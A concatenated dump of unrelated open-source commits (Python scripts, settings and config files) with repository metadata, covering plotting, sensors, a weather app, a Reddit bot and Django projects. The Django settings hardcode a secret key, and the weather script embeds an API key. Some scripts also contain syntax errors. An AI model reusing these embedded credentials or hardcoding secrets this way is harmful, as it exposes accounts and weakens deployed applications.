# NOTE(review): `data` and `time` are loaded/derived but never used below --
# presumably leftovers; load_data_file() also downloads the file on first use.
data = np.load(io.load_data_file('electrophys/iv_curve.npz'))['arr_0']
time = np.arange(0, data.shape[1], 1e-4)
fig = vp.Fig(size=(800, 800), show=False)
x = np.linspace(0, 10, 20)
y = np.cos(x)
line = fig[0, 0].plot((x, y), symbol='o', width=3, title='I/V Curve',
                      xlabel='Current (pA)', ylabel='Membrane Potential (mV)')
grid = vp.visuals.GridLines(color=(0, 0, 0, 0.5))
grid.set_gl_state('translucent')
fig[0, 0].view.add(grid)
fig.show()
# render() rasterizes off-screen via OSMesa; no display server is needed.
img = fig.render()
io.write_png("osmesa.png", img)
| bsd-3-clause | Python |
a951a29062f1fb7946b4d227f6fa0b3b3d5b9a04 | Add a bindings.gyp file for use with node-gyp. | Jonekee/node-serialport,nebrius/node-serialport,Scypho/node-serialport,voodootikigod/node-serialport,pr0duc3r/node-serialport,bmathews/node-serialport,bmathews/node-serialport,mcanthony/node-serialport,tmpvar/node-serialport,Scypho/node-serialport,usefulthink/node-serialport,hybridgroup/node-serialport,alex1818/node-serialport,keyvanfatehi/node-serialport,songshuang00/node-serialport,node-serialport/node-serialport,julianduque/node-serialport,giseburt/node-serialport,ms-iot/node-serialport,kt3k/node-serialport,alex1818/node-serialport,AlexeyPopov/node-serialport,AlexeyPopov/node-serialport,gregfriedland/node-serialport,jacobrosenthal/node-serialport,TooTallNate/node-serialport,voodootikigod/node-serialport,kt3k/node-serialport,EmergingTechnologyAdvisors/node-serialport,ddm/node-serialport,node-serialport/node-serialport,kt3k/node-serialport,bmathews/node-serialport,djchie/node-serialport,tigoe/node-serialport,pr0duc3r/node-serialport,mbedded-ninja/node-serialport,entrylabs/node-serialport,node-serialport/node-serialport,munyirik/node-serialport,mbedded-ninja/node-serialport,usefulthink/node-serialport,SimplyComplexCo/node-serialport,keyvanfatehi/node-serialport,pr0duc3r/node-serialport,djchie/node-serialport,bfjelds/node-serialport,Jonekee/node-serialport,suda/node-serialport,TooTallNate/node-serialport,hybridgroup/node-serialport,node-serialport/node-serialport,Jonekee/node-serialport,julianduque/node-serialport,munyirik/node-serialport,ms-iot/node-serialport,keyvanfatehi/node-serialport,djchie/node-serialport,tmpvar/node-serialport,AlexeyPopov/node-serialport,munyirik/node-serialport,alex1818/node-serialport,aessig/node-serialport,bfjelds/node-serialport,cmaglie/node-serialport,mbedded-ninja/node-serialport,giseburt/node-serialport,tmpvar/node-serialport,SimplyComplexCo/node-serialport,aessig/node-serialport,entrylabs/node-serialport,EmergingTechnologyAdvisors/node-serialpo
rt,ms-iot/node-serialport,julianduque/node-serialport,voodootikigod/node-serialport,jacobrosenthal/node-serialport,mcanthony/node-serialport,giseburt/node-serialport,usefulthink/node-serialport,Scypho/node-serialport,bfjelds/node-serialport,mcanthony/node-serialport,songshuang00/node-serialport,keyvanfatehi/node-serialport,prodatakey/node-serialport,rhuehn/node-serialport,ddm/node-serialport,SimplyComplexCo/node-serialport,node-serialport/node-serialport,rodovich/node-serialport,cmaglie/node-serialport,samofab/node-nisa-old,nebrius/node-serialport,gregfriedland/node-serialport,rodovich/node-serialport,usefulthink/node-serialport,hybridgroup/node-serialport,cmaglie/node-serialport,songshuang00/node-serialport,giseburt/node-serialport,ms-iot/node-serialport,nebrius/node-serialport,jacobrosenthal/node-serialport,mcanthony/node-serialport,rhuehn/node-serialport,tmpvar/node-serialport,Pixformance/node-serialport,ddm/node-serialport,Pixformance/node-serialport,prodatakey/node-serialport,mbedded-ninja/node-serialport,voodootikigod/node-serialport,hybridgroup/node-serialport,tigoe/node-serialport,rhuehn/node-serialport,ddm/node-serialport,djchie/node-serialport,entrylabs/node-serialport,munyirik/node-serialport,EmergingTechnologyAdvisors/node-serialport,tigoe/node-serialport,EmergingTechnologyAdvisors/node-serialport,aessig/node-serialport,alex1818/node-serialport,pr0duc3r/node-serialport,gregfriedland/node-serialport,entrylabs/node-serialport,suda/node-serialport,SimplyComplexCo/node-serialport,rodovich/node-serialport,rhuehn/node-serialport,kt3k/node-serialport,TooTallNate/node-serialport,rodovich/node-serialport,Scypho/node-serialport,EmergingTechnologyAdvisors/node-serialport,prodatakey/node-serialport,tigoe/node-serialport,gregfriedland/node-serialport,cmaglie/node-serialport,bfjelds/node-serialport,julianduque/node-serialport,suda/node-serialport,TooTallNate/node-serialport,Pixformance/node-serialport,suda/node-serialport,entrylabs/node-serialport,bmathews/node-serial
port,songshuang00/node-serialport,jacobrosenthal/node-serialport,AlexeyPopov/node-serialport,samofab/node-nisa-old,nebrius/node-serialport,samofab/node-nisa-old,aessig/node-serialport,Jonekee/node-serialport,ms-iot/node-serialport,Pixformance/node-serialport,prodatakey/node-serialport | bindings.gyp | bindings.gyp | {
'targets': [
{
'target_name': 'serialport_native',
'sources': [ 'serialport_native/serialport_native.cc' ]
}
]
}
| mit | Python | |
2a9e403d154870e29fa751bf598b5fb9d8662668 | Create send_sensor_data.py | lupyuen/iotapps,lupyuen/iotapps | send_sensor_data.py | send_sensor_data.py | #!/usr/bin/env python
#
# GrovePi Example for using the Grove Temperature Sensor (http://www.seeedstudio.com/wiki/Grove_-_Temperature_Sensor)
#
# The GrovePi connects the Raspberry Pi and Grove sensors. You can learn more about GrovePi here: http://www.dexterindustries.com/GrovePi
#
# Have a question about this example? Ask on the forums here: http://www.dexterindustries.com/forum/?forum=grovepi
#
'''
## License
The MIT License (MIT)
GrovePi for the Raspberry Pi: an open source platform for connecting Grove Sensors to the Raspberry Pi.
Copyright (C) 2015 Dexter Industries
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
'''
# NOTE:
# The sensor uses a thermistor to detect ambient temperature.
# The resistance of a thermistor will increase when the ambient temperature decreases.
#
# There are 3 revisions 1.0, 1.1 and 1.2, each using a different model thermistor.
# Each thermistor datasheet specifies a unique Nominal B-Constant which is used in the calculation forumla.
#
# The second argument in the grovepi.temp() method defines which board version you have connected.
# Defaults to '1.0'. eg.
# temp = grovepi.temp(sensor) # B value = 3975
# temp = grovepi.temp(sensor,'1.1') # B value = 4250
# temp = grovepi.temp(sensor,'1.2') # B value = 4250
import time
import grovepi
import datetime
from temboo.Library.Google.Spreadsheets import AddListRows
from temboo.core.session import TembooSession
# Connect the Grove Light Sensor to analog port A0
# SIG,NC,VCC,GND
light_sensor = 0
grovepi.pinMode(light_sensor, "INPUT")
# Connect the Grove Temperature Sensor to analog port A1
# SIG,NC,VCC,GND
temp_sensor = 1
# Connect the Grove Sound Sensor to analog port A2
# SIG,NC,VCC,GND
sound_sensor = 2
while True:
try:
# Get the current timestamp.
now = datetime.datetime.now()
timestamp = str(now)
# Get sensor values.
lightLevel = grovepi.analogRead(light_sensor)
temp = grovepi.temp(temp_sensor, '1.1')
soundLevel = grovepi.analogRead(sound_sensor)
# TODO: Get this from a humidity sensor.
humidity = "75"
# Show the sensor values for debugging.
print ("timestamp=", timestamp)
print ("lightLevel=", lightLevel)
print ("temp=", temp)
print ("soundLevel=", soundLevel)
# Send the sensor data to the Google Spreadsheet through Temboo.
# Create a session with your Temboo account details
session = TembooSession(“USERID”, “APPNAME”, “APPKEY”)
# Instantiate the Choreo
addListRowsChoreo = AddListRows(session)
# Get an InputSet object for the Choreo
addListRowsInputs = addListRowsChoreo.new_input_set()
# Set credential to use for execution
addListRowsInputs.set_credential('SensorData')
# Set the data to be added
addListRowsInputs.set_RowsetXML("""
<rowset>
<row>
<Timestamp>{0}</Timestamp>
<Temperature>{1}</Temperature>
<Humidity>{2}</Humidity>
<LightLevel>{3}</LightLevel>
<SoundLevel>{4}</SoundLevel>
</row>
</rowset>
""".format(timestamp, temp, humidity, lightLevel, soundLevel))
# Execute the Choreo
addListRowsResults = addListRowsChoreo.execute_with_results(addListRowsInputs)
# Print the Choreo outputs
print("Response: " + addListRowsResults.get_Response())
print("NewAccessToken: " + addListRowsResults.get_NewAccessToken())
# TODO: Delay and continue
break
time.sleep(.5)
except KeyboardInterrupt:
break
except IOError:
print ("Error")
| mit | Python | |
34f7d76cb1f56280b636f4b98968c17a8b9a2c14 | Create TestRSS.py | AllwinLeoPrakash/RSSFeedCollector | TestRSS.py | TestRSS.py | '''
Created on Jul 17, 2014
@author: ALLWINLEOPRAKASH
'''
import RssFeedCollector as rs
import datetime
rs.OPFileCheck()
var = 1
# Continuous active loop to retrieve real time data
while var == 1:
sec = datetime.datetime.now().second
# Check and append the new entries every 20 seconds
if sec % 20 == 0:
rs.FeedCollector()
| epl-1.0 | Python | |
3024ff0fe1343dac11adba82ec28d3a27f4e0d70 | add TXT | liam-middlebrook/gallery,liam-middlebrook/gallery,liam-middlebrook/gallery,liam-middlebrook/gallery | gallery/file_modules/txt.py | gallery/file_modules/txt.py | import os
from gallery.file_modules import FileModule
from gallery.util import hash_file
class TXTFile(FileModule):
def __init__(self, file_path):
FileModule.__init__(self, file_path)
self.mime_type = "text/plain"
| mit | Python | |
35da1d5dd86fd597f31c2fb816b2b7e3f89ab021 | Revert "removing settings.py, since it's ignored by .gitignore" | zg/CSCWebsite,rit-csc/CSCWebsite,rit-csc/CSCWebsite,zg/CSCWebsite,rit-csc/CSCWebsite,zg/CSCWebsite | csc_new/csc_new/settings.py | csc_new/csc_new/settings.py | """
Django settings for csc_new project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Template Directories
TEMPLATE_DIRS = (
'csc_new/templates',
)
# Reference our custom Member model as the default user model
#AUTH_USER_MODEL = 'member.Member'
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'pp0_w0sbde9&ye%!*i&!)76nq7-y22fbfpvb9heze*&)8j7dpi'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
TEMPLATE_DEBUG = False
ALLOWED_HOSTS = ['.cs.rit.edu']
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'pages',
# 'member',
'django.contrib.webdesign',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'csc_new.middleware.TemplateDoesNotExistMiddleware',
)
ROOT_URLCONF = 'csc_new.urls'
WSGI_APPLICATION = 'csc_new.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = "US/Eastern"
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIA_URL = '/media/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
STATIC_URL = '/static/'
STATICFILES_DIRS = (
os.path.join(BASE_DIR, 'staticfiles'),
)
| mit | Python | |
8bdc5c69ef2a45ca4eaeef6f096e1ddf688801b4 | Create Weather.py | Redder/Weather-App-Python | Weather.py | Weather.py | #Import all the libraries we need
import unirest
import json
import os
#Assign X to 1 for our loop (We can use a While True Loop too)
x = 1
#Prints Welcome Screen
os.system('cls')
print('================================')
print('Welcome to the Weather App!')
print('Press Enter to Continue!')
print('================================')
raw_input('')
#While Loops begins, You can use While True loop too
while x == 1:
#UserValue equals What the user inputs, the city or state
UserValue = raw_input('Please enter a City or State: ')
#Replace Space with a plus sign(So we can pass it onto the url)
UserValue = UserValue.replace(' ','+' )
#Make web request to the url(with url value attached) with the Mashape KEY and the content type
response = unirest.get("https://george-vustrey-weather.p.mashape.com/api.php?location=" + UserValue,
headers={
"X-Mashape-Key": "OhsfFL6TbrmshiTM9x9bpp7ySvSfp1Bjbiojsnj2DWPU7n2u6Z",
"Accept": "application/json"
}
)
#Assigned the JSON Data we recieved with the varible data
data = json.loads(response.raw_body)
#Try to extract data and apply to varibles
try:
DOW1 = data[0]["day_of_week"]
DOW2 = data[1]["day_of_week"]
DOW3 = data[2]["day_of_week"]
DOW4 = data[3]["day_of_week"]
DOW5 = data[4]["day_of_week"]
DOW6 = data[5]["day_of_week"]
DOW7 = data[6]["day_of_week"]
H1 = data[0]["high"]
H2 = data[1]["high"]
H3 = data[2]["high"]
H4 = data[3]["high"]
H5 = data[4]["high"]
H6 = data[5]["high"]
H7 = data[6]["high"]
L1 = data[0]["low"]
L2 = data[1]["low"]
L3 = data[2]["low"]
L4 = data[3]["low"]
L5 = data[4]["low"]
L6 = data[5]["low"]
L7 = data[6]["low"]
C1 = data[0]["condition"]
C2 = data[1]["condition"]
C3 = data[2]["condition"]
C4 = data[3]["condition"]
C5 = data[4]["condition"]
C6 = data[5]["condition"]
C7 = data[6]["condition"]
print('\n')
print('================================')
print(DOW1)
print('Condition: ' + C1)
print('High: ' + H1)
print('Low: ' + L1)
print('================================')
print('\n')
print('================================')
print(DOW2)
print('Condition: ' + C2)
print('High: ' + H2)
print('Low: ' + L2)
print('================================')
print('\n')
print('================================')
print(DOW3)
print('Condition: ' + C3)
print('High: ' + H3)
print('Low: ' + L3)
print('================================')
print('\n')
print('================================')
print(DOW4)
print('Condition: ' + C4)
print('High: ' + H4)
print('Low: ' + L4)
print('================================')
print('\n')
print('================================')
print(DOW5)
print('Condition: ' + C5)
print('High: ' + H5)
print('Low: ' + L5)
print('================================')
print('\n')
print('================================')
print(DOW6)
print('Condition: ' + C6)
print('High: ' + H6)
print('Low: ' + L6)
print('================================')
print('\n')
print('================================')
print(DOW7)
print('Condition: ' + C7)
print('High: ' + H7)
print('Low: ' + L7)
print('================================')
print('\n')
raw_input('')
pass
#If the data does not exist, it may be due to the user inputting something thats not a city or state
except KeyError, e:
#Clear Screen and show error message we get from API
os.system('cls')
print('Error ' + str(data[0]['code']) + ':' + ' ' + data[0]['message'])
raw_input('')
#Clear Screen and ask user if they want to quit or perform a search again
os.system('cls')
print('Would you like to search again? or Quit?')
print('1: Search again')
print('2: Quit')
ans = input('')
#If the quit, then x = 2 which breaks out of the loop, if Search again then do nothing and the Loop will restart
if ans == 2:
x = 2
| mit | Python | |
d4c30f4e70dabe18c73eeb0feaa49ee4dcead2ff | Create groceries.py | oliverwreath/Wide-Range-of-Webs,oliverwreath/Wide-Range-of-Webs,oliverwreath/Wide-Range-of-Webs,oliverwreath/Wide-Range-of-Webs | groceries.py | groceries.py | groceries = ["banana", "orange", "apple"]
stock = { "banana": 6,
"apple": 0,
"orange": 32,
"pear": 15
}
prices = { "banana": 4,
"apple": 2,
"orange": 1.5,
"pear": 3
}
# Write your code below!
def compute_bill(food):
total = 0
for item in food:
if stock[item] > 0:
total = total + prices[item]
stock[item] = stock[item] - 1
return total
| agpl-3.0 | Python | |
a8dc3e1143290495ab56b30660e7fbe58fcaa36c | add analysis script | gammapy/fhee | v01/analyse_data.py | v01/analyse_data.py | # this analysis script finds the photons with the highest energy for the crab nebula from the 2FHL event list
from numpy import *
from astropy.io import fits
hdulist=fits.open('gll_psch_v08.fit.gz')
print hdulist.info()
datalist=hdulist[1] #hdu=1 is the source catalog, found using "ftlist" or "hdulist.info()"
N=len(datalist.data)
print N
#loop over fermi 2FHL catalog
for i in range(N+1):
data= datalist.data[i-1] # -1 otherwise it raises an error
string =data['Source_Name']
if (string=='2FHL J0534.5+2201'):
x=data['RAJ2000']
y=data['DEJ2000']
print (x, y)
from astropy.io import fits
hdulist2=fits.open('2fhl_events.fits.gz')
print hdulist2.info()
datalist2=hdulist2[1] #hdu=1 is the event list
data2=datalist2.data
N=len(datalist2.data)
# prepare data
data2= datalist2.data
data2_x=data2['RA']
data2_y=data2['DEC']
data2_energy=data2['ENERGY']
r=sqrt(pow(data2_x-x,2)+pow(data2_y-y,2))
# initialize empty list for events
list = []
#loop over radii to find all events in a circle of 3 deg
for i in range(len(r)):
if r[i] < 3:
list.append(data2_energy[i])
print max(list)
a = sorted(list, reverse=True)
#finally print events with highest energies
print (a[1], a[2], a[3])
| mit | Python | |
52a83fa5fc6ca029c87b50c64e0e3d08bdf1d081 | Create pyton_test.py | tpaivaa/uraspi,tpaivaa/uraspi | pyton_test.py | pyton_test.py | import RPi.GPIO as GPIO
GPIO.setmode(GPIO.BCM)
GPIO.setup(2, GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.setup(7, GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.setup(17, GPIO.OUT)
GPIO.setup(22, GPIO.OUT)
def verantavalo(channel):
time.sleep(0.1)
if GPIO.input(2) != GPIO.HIGH:
return
if(GPIO.input(17) == 0):
GPIO.output(17,1)
else:
GPIO.output(17,0)
def ulkovalo(channel):
time.sleep(0.1)
if GPIO.input(7) != GPIO.HIGH:
return
if(GPIO.input(22) == 0):
GPIO.output(22,1)
else:
GPIO.output(22,0)
GPIO.add_event_detect(2, GPIO.RISING, callback=verantavalo)
GPIO.add_event_detect(7, GPIO.RISING, callback=ulkovalo)
| mit | Python | |
096ea11231668e0fd03c1628c255cf0b08c0bfc3 | Create HouseCupBot.py | chrisxonPlugins/chrisxon,DW3B/HouseCupBot | HouseCupBot.py | HouseCupBot.py | import praw, time, sqlite3, operator, re
#Bot setup
username = 'HouseCupBot'
password = ''
userAgent = 'HouseCupBot. Keeps a running score for Hogwarts houses. Author: u/d_web'
houses = ['gryffindor','hufflepuff','ravenclaw','slytherin']
tagLine = 'HouseCupBot by u/D_Web. Type "HouseCupBot !help" for more info.'
replies = ['%s points awarded to %s\n\n', 'Current Standings:\n\n', 'Winners:\n\n', 'Need Help?']
#Set up SQL database. Create tables if they dont exist.
print 'Setting up SQL Database...',
sql = sqlite3.connect(housecupbot.db)
cur = sql.cursor()
cur.execute('CREATE TABLE IF NOT EXISTS oldposts(ID TEXT)')
cur.execute('CREATE TABLE IF NOT EXISTS scores(NAME TEXT, POINTS REAL))
cur.execute('CREATE TABLE IF NOT EXISTS winners(NAME TEXT, TIME_PER TEXT, POINTS REAL))
sql.commit()
print 'DONE'
#Log in to reddit
print 'Logging in to Reddit...',
r = praw.Reddit(userAgent)
r.login(username, password)
print 'DONE'
def sortedDict(dict):
s_dict = sorted(dict.iteritems(), key=operator.itemgetter(1))
return s_dict[len(s_dict)-1]
def subScan():
sub = r.get_subreddit('all')
posts = sub.get_comments(limit=100)
for post in posts:
pid = post.id
try:
p_auth = post.author.name
except:
p_auth = '[DELETED]'
cur.execute('SELECT * FROM oldposts WHERE ID=?', pid)
if not cur.fetchone():
cur.execute('INSERT INTO oldposts VALUES(?)', pid)
p_body = post.body.lower()
for house in houses:
re_result = re.match('\A\d{1,3}\spoints for %s$' % house, p_body)
if re_result:
pass
| mit | Python | |
5411224e9683c9ee6a8b06ff9b666a93948e6a69 | Create example.py | garygitt/pyqtable | example.py | example.py | #TABLE LOAD
self.table_data = QtGui.QTableView()
cols=['rowid','data']
data = [(1,'data1'),(2,'data2'),]
table.load(self.table_data,data,cols,order=0,col=0)
#TABLE SORT
def context(self,pos):
mainmenu = QtGui.QMenu("Menu", self)
mainmenu.addAction("Sort")
C = self.mapFromGlobal(QCursor.pos())
pos.setY(C.y()); pos.setX(C.x())
action = mainmenu.exec_(self.mapToGlobal(pos))
if action.text() == 'Sort':
table.sort(self.sender())
| artistic-2.0 | Python | |
8e1e905f5dbdaccc396ec74fb7c05a93d79c35ff | Add example to show failure for #62. | talitarossari/flasgger,flasgger/flasgger,rochacbruno/flasgger,rochacbruno/flasgger,talitarossari/flasgger,rochacbruno/flasgger,talitarossari/flasgger,flasgger/flasgger,flasgger/flasgger,flasgger/flasgger | examples/example_blueprint.py | examples/example_blueprint.py | from flask import Blueprint, Flask, jsonify
from flasgger import Swagger
from flasgger.utils import swag_from
app = Flask(__name__)
example_blueprint = Blueprint("example_blueprint", __name__)
@example_blueprint.route('/usernames', methods=['GET', 'POST'])
@swag_from('username_specs.yml', methods=['GET'])
@swag_from('username_specs.yml', methods=['POST'])
def usernames(username):
return jsonify({'username': username})
swag = Swagger(app, config={})
if __name__ == "__main__":
app.run(debug=True)
| mit | Python | |
158d3c6478f4d9d83d166504febc2ba1ba4e58f7 | Add example. | Kami/python-libcloud-dns-to-bind-zone | example.py | example.py | # Licensed to Tomaz Muraus under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# Tomaz muraus licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from libcloud.dns.types import Provider
from libcloud.dns.providers import get_driver
from libcloud_to_bind import libcloud_zone_to_bind_zone_file
DOMAIN_TO_EXPORT = 'example.com'
Zerigo = get_driver(Provider.ZERIGO)
driver = Zerigo('email', 'api key')
zones = driver.list_zones()
zone = [z for z in zones if z.domain == DOMAIN_TO_EXPORT][0]
result = libcloud_zone_to_bind_zone_file(zone=zone)
print(result)
| apache-2.0 | Python | |
7c87974c862184df8df40595ba26f5ff7082c4a6 | Add a CIB routing fuzzer | gatecat/prjoxide,gatecat/prjoxide,gatecat/prjoxide | fuzzers/LIFCL/002-cib-routing/fuzzer.py | fuzzers/LIFCL/002-cib-routing/fuzzer.py | from fuzzconfig import FuzzConfig
from interconnect import fuzz_interconnect
import re
configs = [
((1, 18), FuzzConfig(job="CIBTROUTE", device="LIFCL-40", sv="../shared/route_40.v", tiles=["CIB_R1C18:CIB_T"]), set(["TAP_CIBT_R1C14:TAP_CIBT"])),
((18, 1), FuzzConfig(job="CIBLRROUTE", device="LIFCL-40", sv="../shared/route_40.v", tiles=["CIB_R18C1:CIB_LR"]), set(["TAP_PLC_R18C14:TAP_PLC"])),
((28, 17), FuzzConfig(job="CIBROUTE", device="LIFCL-40", sv="../shared/route_40.v", tiles=["CIB_R28C17:CIB"]), set(["TAP_PLC_R28C14:TAP_PLC"]))
]
def main():
for rc, cfg, ignore in configs:
cfg.setup()
r, c = rc
nodes = ["R{}C{}_J*".format(r, c)]
extra_sources = []
extra_sources += ["R{}C{}_H02E{:02}01".format(r, c+1, i) for i in range(8)]
extra_sources += ["R{}C{}_H06E{:02}03".format(r, c+3, i) for i in range(4)]
extra_sources += ["R{}C{}_V02N{:02}01".format(r-1, c, i) for i in range(8)]
extra_sources += ["R{}C{}_V06N{:02}03".format(r-3, c, i) for i in range(4)]
extra_sources += ["R{}C{}_V02S{:02}01".format(r+1, c, i) for i in range(8)]
extra_sources += ["R{}C{}_V06S{:02}03".format(r+3, c, i) for i in range(4)]
extra_sources += ["R{}C{}_H02W{:02}01".format(r, c-1, i) for i in range(8)]
extra_sources += ["R{}C{}_H06W{:02}03".format(r, c-3, i) for i in range(4)]
def pip_filter(pip, nodes):
from_wire, to_wire = pip
return not ("_CORE" in from_wire or "_CORE" in to_wire or "JCIBMUXOUT" in to_wire)
fuzz_interconnect(config=cfg, nodenames=nodes, regex=True, bidir=True, ignore_tiles=ignore,
pip_predicate=pip_filter)
fuzz_interconnect(config=cfg, nodenames=extra_sources, regex=False, bidir=False, ignore_tiles=ignore,
pip_predicate=pip_filter)
if __name__ == "__main__":
main()
| isc | Python | |
bbbdaed24390b7c5808cc7233b6ad0566c09f188 | add python C wrapper; mostly empty for now | jobovy/galpy,followthesheep/galpy,followthesheep/galpy,jobovy/galpy,jobovy/galpy,followthesheep/galpy,jobovy/galpy,followthesheep/galpy | galpy/orbit_src/integratePlanarOrbit.py | galpy/orbit_src/integratePlanarOrbit.py | def integratePlanarOrbit_leapfrog(pot,yo,t,rtol=None,atol=None):
"""
NAME:
integratePlanarOrbit_leapfrog
PURPOSE:
leapfrog integrate an ode for a planarOrbit
INPUT:
pot - Potential or list of such instances
yo - initial condition [q,p]
t - set of times at which one wants the result
rtol, atol
OUTPUT:
y : array, shape (len(y0), len(t))
Array containing the value of y for each desired time in t, \
with the initial value y0 in the first row.
HISTORY:
2011-10-03 - Written - Bovy (NYU)
"""
| bsd-3-clause | Python | |
7b560ea31ad4e308d01926f1e73cb6deb6b24a6a | Clarify location of settings/local.py-dist | mythmon/airmozilla,mythmon/airmozilla,anu7495/airmozilla,tannishk/airmozilla,EricSekyere/airmozilla,zofuthan/airmozilla,blossomica/airmozilla,EricSekyere/airmozilla,lcamacho/airmozilla,ehsan/airmozilla,kenrick95/airmozilla,kenrick95/airmozilla,mythmon/airmozilla,zofuthan/airmozilla,anjalymehla/airmozilla,EricSekyere/airmozilla,anjalymehla/airmozilla,ehsan/airmozilla,EricSekyere/airmozilla,chirilo/airmozilla,anu7495/airmozilla,zofuthan/airmozilla,blossomica/airmozilla,anjalymehla/airmozilla,anu7495/airmozilla,anjalymehla/airmozilla,a-buck/airmozilla,kenrick95/airmozilla,tannishk/airmozilla,blossomica/airmozilla,Nolski/airmozilla,Nolski/airmozilla,bugzPDX/airmozilla,chirilo/airmozilla,mozilla/airmozilla,chirilo/airmozilla,a-buck/airmozilla,zofuthan/airmozilla,kenrick95/airmozilla,mozilla/airmozilla,Nolski/airmozilla,a-buck/airmozilla,lcamacho/airmozilla,bugzPDX/airmozilla,blossomica/airmozilla,mythmon/airmozilla,chirilo/airmozilla,Nolski/airmozilla,tannishk/airmozilla,zofuthan/airmozilla,chirilo/airmozilla,kenrick95/airmozilla,lcamacho/airmozilla,lcamacho/airmozilla,mythmon/airmozilla,mozilla/airmozilla,mozilla/airmozilla,lcamacho/airmozilla,tannishk/airmozilla,a-buck/airmozilla,ehsan/airmozilla,EricSekyere/airmozilla,anu7495/airmozilla,bugzPDX/airmozilla,anjalymehla/airmozilla,bugzPDX/airmozilla,anu7495/airmozilla,Nolski/airmozilla,ehsan/airmozilla,ehsan/airmozilla,tannishk/airmozilla | airmozilla/settings/__init__.py | airmozilla/settings/__init__.py | from .base import *
try:
from .local import *
except ImportError, exc:
exc.args = tuple(['%s (did you rename airmozilla/settings/local.py-dist?)' % exc.args[0]])
raise exc
| from .base import *
try:
from .local import *
except ImportError, exc:
exc.args = tuple(['%s (did you rename settings/local.py-dist?)' % exc.args[0]])
raise exc
| bsd-3-clause | Python |
70b21201df3c1b6e476f8dbfee53490bd16a6d00 | Add Fabric fabfile for project management | riggsd/davies | fabfile.py | fabfile.py | """
Fabric fabfile for Davies cave survey package.
Run `pip install fabric` to install, then `fab --list` to see available commands.
"""
from fabric.api import local, lcd, with_settings
def test():
"""Run project unit tests."""
local('python -m unittest discover -v -s tests')
unittest = test
@with_settings(warn_only=True)
def pep8():
"""Check source for PEP8 conformance."""
local('pep8 --max-line-length=120 davies')
def precommit():
"""Run pre-commit unit tests and lint checks."""
pep8()
local('pylint -f colorized --errors-only davies')
test()
def lint(fmt='colorized'):
"""Run verbose PyLint on source. Optionally specify fmt=html for HTML output."""
if fmt == 'html':
outfile = 'pylint_report.html'
local('pylint -f %s davies > %s || true' % (fmt, outfile))
local('open %s' % outfile)
else:
local('pylint -f %s davies || true' % fmt)
pylint = lint
def clean():
"""Clean up generated files."""
local('rm -rf dist')
local('rm -f pylint_report.html')
local('find . -name "*.pyc" | xargs rm')
with lcd('docs'):
local('make clean')
def release(version):
"""Perform git-flow release merging and PyPI upload."""
clean()
local('git co master')
local('git merge --no-ff dev')
local('git tag %s' % version)
local('python setup.py sdist upload')
def doc(fmt='html'):
"""Build Sphinx HTML documentation."""
with lcd('docs'):
local('make %s' % fmt)
if fmt == 'html':
local('open docs/_build/html/index.html')
docs = doc
| mit | Python | |
609784dc106e01800eed0a7ccf88f82d6977d408 | Add missed language update migrations | cdubz/babybuddy,cdubz/babybuddy,cdubz/babybuddy | babybuddy/migrations/0008_auto_20200120_0622.py | babybuddy/migrations/0008_auto_20200120_0622.py | # Generated by Django 3.0.2 on 2020-01-20 14:22
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('babybuddy', '0007_auto_20190607_1422'),
]
operations = [
migrations.AlterField(
model_name='settings',
name='language',
